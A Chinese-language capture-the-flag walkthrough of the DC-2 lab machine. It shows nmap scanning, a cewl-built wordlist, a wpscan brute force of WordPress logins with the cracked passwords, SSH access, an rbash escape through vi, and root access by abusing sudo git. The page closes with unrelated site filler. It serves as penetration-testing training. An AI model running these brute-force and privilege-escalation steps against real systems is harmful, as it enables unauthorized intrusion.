4. DC-2靶機(jī)

【offensive-security】3.DC-2靶機(jī)

dc-2_1.png

一、獲取靶機(jī)信息

1.已知信息:

  • IP: 192.168.245.193

2.獲取信息:

  • nmap掃描開啟的服務(wù)
┌──(root?0xlo0p)-[/home/lo0p]
└─# nmap -p "*" -A 192.168.245.194
Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-26 19:25 CST
Nmap scan report for dc-2 (192.168.245.194)
Host is up (0.30s latency).
Not shown: 8349 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: DC-2 – Just another WordPress site
|_http-generator: WordPress 4.7.10
7744/tcp open  ssh     OpenSSH 6.7p1 Debian 5+deb8u7 (protocol 2.0)
| ssh-hostkey: 
|   1024 52:51:7b:6e:70:a4:33:7a:d2:4b:e1:0b:5a:0f:9e:d7 (DSA)
|   2048 59:11:d8:af:38:51:8f:41:a7:44:b3:28:03:80:99:42 (RSA)
|   256 df:18:1d:74:26:ce:c1:4f:6f:2f:c1:26:54:31:51:91 (ECDSA)
|_  256 d9:38:5f:99:7c:0d:64:7e:1d:46:f6:e9:7c:c6:37:17 (ED25519)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).

開了一個80端口事镣,一個7744的ssh端口,先看web冒滩,直接用IP訪問的話訪問不上,會跳到http://dc-2,我們需要修改/etc/hosts文件,修改http://dc-2的本地緩存

修改hosts:

┌──(root?0xlo0p)-[/home/lo0p]
└─# cat /etc/hosts    
127.0.0.1       localhost
192.168.245.194 dc-2

修改完后重啟networking服務(wù)灌曙,/etc/init.d/networking restart

dc-2_2.png

在首頁發(fā)現(xiàn)了第一個flag提示

Your usual wordlists probably won’t work, so instead, maybe you just need to be cewl.

More passwords is always better, but sometimes you just can’t win them all.

Log in as one to see the next flag.

If you can’t find it, log in as another.

你通常的字典可能行不通,所以推姻,也許你只需要保持冷靜。

更多的密碼總是更好的框沟,但有時你只是不能贏得所有的密碼藏古。

以個人身份登錄以查看下一個標(biāo)志。

如果找不到忍燥,請以其他身份登錄拧晕。

3.爆破WP用戶名及密碼

看樣子是要我們爆破,但是又告訴我們平常的字典沒用梅垄,于是看到關(guān)鍵字cewl厂捞,這個工具可以爬取網(wǎng)站并保存相關(guān)關(guān)鍵字作為字典,使用指南:kali密碼攻擊工具——Cewl使用指南 | 碼農(nóng)網(wǎng) (codercto.com)

┌──(root?0xlo0p)-[/home/lo0p]
└─# cewl http://dc-2/ -w Desktop/wp2.txt      #將爬取到的字典保存到wp2.txt
CeWL 5.5.2 (Grouping) Robin Wood (robin@digi.ninja) (https://digi.ninja/)

有了密碼字典,還需要知道有哪些用戶名靡馁,上wpscan神器:

┌──(lo0p?0xlo0p)-[~/Desktop]
└─$ wpscan --url http://dc-2 -e u
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ?
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.20
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://dc-2/ [192.168.245.194]
[+] Started: Wed Oct 26 19:39:38 2022

[i] User(s) Identified:

[+] admin
 | Found By: Rss Generator (Passive Detection)
 | Confirmed By:
 |  Wp Json Api (Aggressive Detection)
 |   - http://dc-2/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] jerry
 | Found By: Wp Json Api (Aggressive Detection)
 |  - http://dc-2/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 | Confirmed By:
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] tom
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Wed Oct 26 19:40:07 2022
[+] Requests Done: 58
[+] Cached Requests: 6
[+] Data Sent: 14.614 KB
[+] Data Received: 514.805 KB
[+] Memory used: 207.809 MB
[+] Elapsed time: 00:00:28

用戶名字典也有了欲鹏,我們保存到桌面user.txt上,tom臭墨、jerry赔嚎、admin 一行一個

┌──(lo0p?0xlo0p)-[~/Desktop]
└─$ wpscan --url http://dc-2 -U user.txt -P wp2.txt 
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ?
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.20
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://dc-2/ [192.168.245.194]
[+] Started: Wed Oct 26 19:42:16 2022

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.10 (Debian)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://dc-2/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://dc-2/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://dc-2/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.7.10 identified (Insecure, released on 2018-04-03).
 | Found By: Rss Generator (Passive Detection)
 |  - http://dc-2/index.php/feed/, <generator>https://wordpress.org/?v=4.7.10</generator>
 |  - http://dc-2/index.php/comments/feed/, <generator>https://wordpress.org/?v=4.7.10</generator>

[+] WordPress theme in use: twentyseventeen
 | Location: http://dc-2/wp-content/themes/twentyseventeen/
 | Last Updated: 2022-05-24T00:00:00.000Z
 | Readme: http://dc-2/wp-content/themes/twentyseventeen/README.txt
 | [!] The version is out of date, the latest version is 3.0
 | Style URL: http://dc-2/wp-content/themes/twentyseventeen/style.css?ver=4.7.10
 | Style Name: Twenty Seventeen
 | Style URI: https://wordpress.org/themes/twentyseventeen/
 | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.2 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://dc-2/wp-content/themes/twentyseventeen/style.css?ver=4.7.10, Match: 'Version: 1.2'

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:12 <=============================================================================================================================================================> (137 / 137) 100.00% Time: 00:00:12

[i] No Config Backups Found.

[+] Performing password attack on Xmlrpc against 3 user/s
[SUCCESS] - jerry / adipiscing                                                                                                                                                                                                              
[SUCCESS] - tom / parturient                                                                                                                                                                                                                
Trying admin / log Time: 00:03:22 <==============================================================================================                                                                       > (646 / 1121) 57.62%  ETA: ??:??:??

[!] Valid Combinations Found:
 | Username: jerry, Password: adipiscing
 | Username: tom, Password: parturient

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Wed Oct 26 19:45:55 2022
[+] Requests Done: 788
[+] Cached Requests: 36
[+] Data Sent: 356.206 KB
[+] Data Received: 414.659 KB
[+] Memory used: 252.957 MB
[+] Elapsed time: 00:03:39

拿到了tom和jerry的密碼,我們嘗試登錄后臺胧弛,WEB頁面上沒有登錄入口尤误,我們?nèi)ツ夸洷偏@取:

┌──(root?0xlo0p)-[/home/lo0p]
└─# dirsearch -u http://dc-2/ -e * -x 403 404

  _|. _ _  _  _  _ _|_    v0.4.2                                                                                                                                                                                                            
 (_||| _) (/_(_|| (_| )                                                                                                                                                                                                                     
                                                                                                                                                                                                                                            
Extensions: | HTTP method: GET | Threads: 30 | Wordlist size: 9009

Output File: /root/.dirsearch/reports/dc-2/-_22-10-26_16-51-46.txt

Error Log: /root/.dirsearch/logs/errors-22-10-26_16-51-46.log

Target: http://dc-2/

[16:51:57] Starting: 
[16:53:10] 301 -    0B  - /index.php  ->  http://dc-2/                      
[16:53:16] 200 -   19KB - /license.txt                                      
[16:53:35] 200 -    7KB - /readme.html                                      
[16:53:49] 301 -  299B  - /wp-admin  ->  http://dc-2/wp-admin/              
[16:53:50] 200 -    0B  - /wp-content/                                      
[16:53:50] 200 -    0B  - /wp-config.php                                    
[16:53:50] 200 -   69B  - /wp-content/plugins/akismet/akismet.php           
[16:53:50] 200 -    1B  - /wp-admin/admin-ajax.php                          
[16:53:50] 302 -    0B  - /wp-admin/  ->  http://dc-2/wp-login.php?redirect_to=http%3A%2F%2Fdc-2%2Fwp-admin%2F&reauth=1
[16:53:50] 500 -    0B  - /wp-content/plugins/hello.php                     
[16:53:50] 500 -    4KB - /wp-admin/setup-config.php                        
[16:53:50] 200 -    1KB - /wp-admin/install.php
[16:53:50] 301 -  301B  - /wp-content  ->  http://dc-2/wp-content/          
[16:53:50] 500 -    0B  - /wp-includes/rss-functions.php                    
[16:53:50] 200 -    0B  - /wp-cron.php
[16:53:50] 200 -    2KB - /wp-login.php                                     
[16:53:50] 302 -    0B  - /wp-signup.php  ->  http://dc-2/wp-login.php?action=register
[16:53:51] 301 -  302B  - /wp-includes  ->  http://dc-2/wp-includes/        
[16:53:51] 405 -   42B  - /xmlrpc.php                                       
[16:53:53] 200 -   40KB - /wp-includes/                                     
                                                                             
Task Completed

拿到uri: /wp-login.php

我們登錄上后臺结缚,tom用戶沒任何發(fā)現(xiàn)损晤,但是jerry發(fā)現(xiàn)了flag提示:

dc-2_3.png

If you can’t exploit WordPress and take a shortcut, there is another way.

Hope you found another entry point.

如果你不能利用WordPress并采取快捷方式,還有另一種方法红竭。

希望你找到了另一個切入點(diǎn)尤勋。

這里提示我們WP的exp我們是一個都用不了,經(jīng)msf實驗確實如此德崭,那我們還有什么切入點(diǎn)呢斥黑?回顧開始到現(xiàn)在,好像還有ssh可以利用眉厨,我們可以嘗試ssh爆破锌奴,但是我們可以先試試使用tom和jerry的密碼試試(jerry經(jīng)測試不行,但是可以用tom登錄):

┌──(lo0p?0xlo0p)-[~]
└─$ ssh tom@192.168.245.194 -p 7744
tom@192.168.245.194's password: 

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Oct 26 07:10:05 2022 from 192.168.49.245
tom@DC-2:~$ whoami
-rbash: whoami: command not found

但是只有rbash的權(quán)限憾股,能執(zhí)行的命令限制了很多鹿蜀,這個時候就需要rbash逃逸

4.rbash逃逸

具體原理:(71條消息) 【滲透測試】--- rbash逃逸方法簡述_通地塔的博客-CSDN博客

首先看下能執(zhí)行哪些命令:

tom@DC-2:~$ echo $PATH
/home/tom/usr/bin
tom@DC-2:~$ echo /home/tom/usr/bin/*
/home/tom/usr/bin/less /home/tom/usr/bin/ls /home/tom/usr/bin/scp /home/tom/usr/bin/vi

根據(jù)上面分享的文章,我們可以利用vi來啟動bash

  • vi xxx #進(jìn)入vi界面
  • :set shell=/bin/bash
  • :shell

啟動到bash以后服球,我們?nèi)匀粺o法執(zhí)行其他命令茴恰,因為PATH環(huán)境變量沒設(shè)置對,設(shè)置如下:

tom@DC-2:~$ export PATH=$PATH:/bin/
tom@DC-2:~$ export PATH=$PATH:/usr/bin/
tom@DC-2:~$ echo $PATH
/home/tom/usr/bin:/bin/:/usr/bin/
tom@DC-2:~$ whoami
tom

查看tom的home目錄斩熊,我們發(fā)現(xiàn)了flag3提示:

tom@DC-2:~$ ls
flag3.txt  local.txt  usr
tom@DC-2:~$ cat flag3.txt
Poor old Tom is always running after Jerry. Perhaps he should su for all the stress he causes.

看提示往枣,我們需要從tom用戶su到j(luò)erry用戶,密碼和wpscan爆破出來的一樣:

tom@DC-2:~$ su jerry
Password: 
jerry@DC-2:/home/tom$ cd /home/jerry/
jerry@DC-2:~$ ls
flag4.txt  h
jerry@DC-2:~$ cat flag4.txt
Good to see that you've made it this far - but you're not home yet. 

You still need to get the final flag (the only flag that really counts!!!).  

No hints here - you're on your own now.  :-)

Go on - git outta here!!!!

在jerry的home目錄下發(fā)現(xiàn)了flag4提示粉渠,前面三行說廢話分冈,但是最后一行的git非常顯眼,我們需要嘗試提權(quán)霸株。

5.GIT提權(quán)

  1. 查找具有SUID的二進(jìn)制文件(沒找到能用的)
jerry@DC-2:~$ find / -perm -4000 2>/dev/null
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/sudo
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/procmail
/usr/bin/at
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/sbin/exim4
/bin/umount
/bin/mount
/bin/su
  1. 查看當(dāng)前的權(quán)限
jerry@DC-2:~$ sudo -l
Matching Defaults entries for jerry on DC-2:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User jerry may run the following commands on DC-2:
    (root) NOPASSWD: /usr/bin/git

看來只能根據(jù)提示使用git提權(quán)雕沉,我們上https://gtfobins.github.io/ 查找git的提權(quán)利用

1.sudo git help config
2.輸入 !/bin/bash

成功拿到root權(quán)限:

root@DC-2:/home/jerry# cd /root
root@DC-2:~# ls
final-flag.txt  proof.txt
root@DC-2:~# cat final-flag.txt 
 __    __     _ _       _                    _ 
/ / /\ \ \___| | |   __| | ___  _ __   ___  / \
\ \/  \/ / _ \ | |  / _` |/ _ \| '_ \ / _ \/  /
 \  /\  /  __/ | | | (_| | (_) | | | |  __/\_/ 
  \/  \/ \___|_|_|  \__,_|\___/|_| |_|\___\/   


Congratulatons!!!

A special thanks to all those who sent me tweets
and provided me with feedback - it's all greatly
appreciated.

If you enjoyed this CTF, send me a tweet via @DCAU7.

root@DC-2:~# cat proof.txt 
0d359f3e1b67060936ce02bada010328
最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
  • 序言:七十年代末,一起剝皮案震驚了整個濱河市去件,隨后出現(xiàn)的幾起案子坡椒,更是在濱河造成了極大的恐慌扰路,老刑警劉巖,帶你破解...
    沈念sama閱讀 217,734評論 6 505
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件倔叼,死亡現(xiàn)場離奇詭異汗唱,居然都是意外死亡,警方通過查閱死者的電腦和手機(jī)缀雳,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 92,931評論 3 394
  • 文/潘曉璐 我一進(jìn)店門渡嚣,熙熙樓的掌柜王于貴愁眉苦臉地迎上來,“玉大人肥印,你說我怎么就攤上這事识椰。” “怎么了深碱?”我有些...
    開封第一講書人閱讀 164,133評論 0 354
  • 文/不壞的土叔 我叫張陵腹鹉,是天一觀的道長。 經(jīng)常有香客問我敷硅,道長功咒,這世上最難降的妖魔是什么? 我笑而不...
    開封第一講書人閱讀 58,532評論 1 293
  • 正文 為了忘掉前任绞蹦,我火速辦了婚禮力奋,結(jié)果婚禮上,老公的妹妹穿的比我還像新娘幽七。我一直安慰自己景殷,他們只是感情好,可當(dāng)我...
    茶點(diǎn)故事閱讀 67,585評論 6 392
  • 文/花漫 我一把揭開白布澡屡。 她就那樣靜靜地躺著猿挚,像睡著了一般。 火紅的嫁衣襯著肌膚如雪驶鹉。 梳的紋絲不亂的頭發(fā)上绩蜻,一...
    開封第一講書人閱讀 51,462評論 1 302
  • 那天,我揣著相機(jī)與錄音室埋,去河邊找鬼办绝。 笑死,一個胖子當(dāng)著我的面吹牛姚淆,可吹牛的內(nèi)容都是我干的孕蝉。 我是一名探鬼主播,決...
    沈念sama閱讀 40,262評論 3 418
  • 文/蒼蘭香墨 我猛地睜開眼肉盹,長吁一口氣:“原來是場噩夢啊……” “哼昔驱!你這毒婦竟也來了疹尾?” 一聲冷哼從身側(cè)響起上忍,我...
    開封第一講書人閱讀 39,153評論 0 276
  • 序言:老撾萬榮一對情侶失蹤骤肛,失蹤者是張志新(化名)和其女友劉穎,沒想到半個月后窍蓝,有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體腋颠,經(jīng)...
    沈念sama閱讀 45,587評論 1 314
  • 正文 獨(dú)居荒郊野嶺守林人離奇死亡,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點(diǎn)故事閱讀 37,792評論 3 336
  • 正文 我和宋清朗相戀三年吓笙,在試婚紗的時候發(fā)現(xiàn)自己被綠了淑玫。 大學(xué)時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片。...
    茶點(diǎn)故事閱讀 39,919評論 1 348
  • 序言:一個原本活蹦亂跳的男人離奇死亡面睛,死狀恐怖絮蒿,靈堂內(nèi)的尸體忽然破棺而出,到底是詐尸還是另有隱情叁鉴,我是刑警寧澤土涝,帶...
    沈念sama閱讀 35,635評論 5 345
  • 正文 年R本政府宣布,位于F島的核電站幌墓,受9級特大地震影響但壮,放射性物質(zhì)發(fā)生泄漏。R本人自食惡果不足惜常侣,卻給世界環(huán)境...
    茶點(diǎn)故事閱讀 41,237評論 3 329
  • 文/蒙蒙 一蜡饵、第九天 我趴在偏房一處隱蔽的房頂上張望。 院中可真熱鬧胳施,春花似錦溯祸、人聲如沸。這莊子的主人今日做“春日...
    開封第一講書人閱讀 31,855評論 0 22
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽。三九已至胆绊,卻和暖如春氨鹏,著一層夾襖步出監(jiān)牢的瞬間,已是汗流浹背压状。 一陣腳步聲響...
    開封第一講書人閱讀 32,983評論 1 269
  • 我被黑心中介騙來泰國打工仆抵, 沒想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留,地道東北人种冬。 一個月前我還...
    沈念sama閱讀 48,048評論 3 370
  • 正文 我出身青樓镣丑,卻偏偏與公主長得像,于是被迫代替她去往敵國和親娱两。 傳聞我的和親對象是個殘疾皇子莺匠,可洞房花燭夜當(dāng)晚...
    茶點(diǎn)故事閱讀 44,864評論 2 354

推薦閱讀更多精彩內(nèi)容

  • 環(huán)境: kali: ifconfig #得到:192.168.0.115 局域網(wǎng)探測: arp-scan -l ...
    A文凱閱讀 911評論 0 0
  • 標(biāo)簽:WordPress、rbash十兢、爆破趣竣、git提權(quán) 0x00 環(huán)境準(zhǔn)備 下載地址:https://www.vu...
    z1掛東南閱讀 701評論 0 1
  • 實驗環(huán)境準(zhǔn)備: kali:172.25.0.69 DC-2: MAC地址:00:0C:29:FE:17:D2DC-...
    xioooZorro閱讀 1,380評論 0 0
  • 在開始之前摇庙,需要將靶機(jī)的網(wǎng)絡(luò)連接由橋接模式改為NAT模式,以保證我們的攻擊機(jī)可以發(fā)現(xiàn)靶機(jī)遥缕。 老規(guī)矩卫袒,用nmap -...
    生活的云玩家閱讀 326評論 0 0
  • 實驗環(huán)境:網(wǎng)段:192.168.0.0/24kali ip:192.168.0.108dc-2 mac:00:0c...
    jay_wong_1996閱讀 323評論 0 1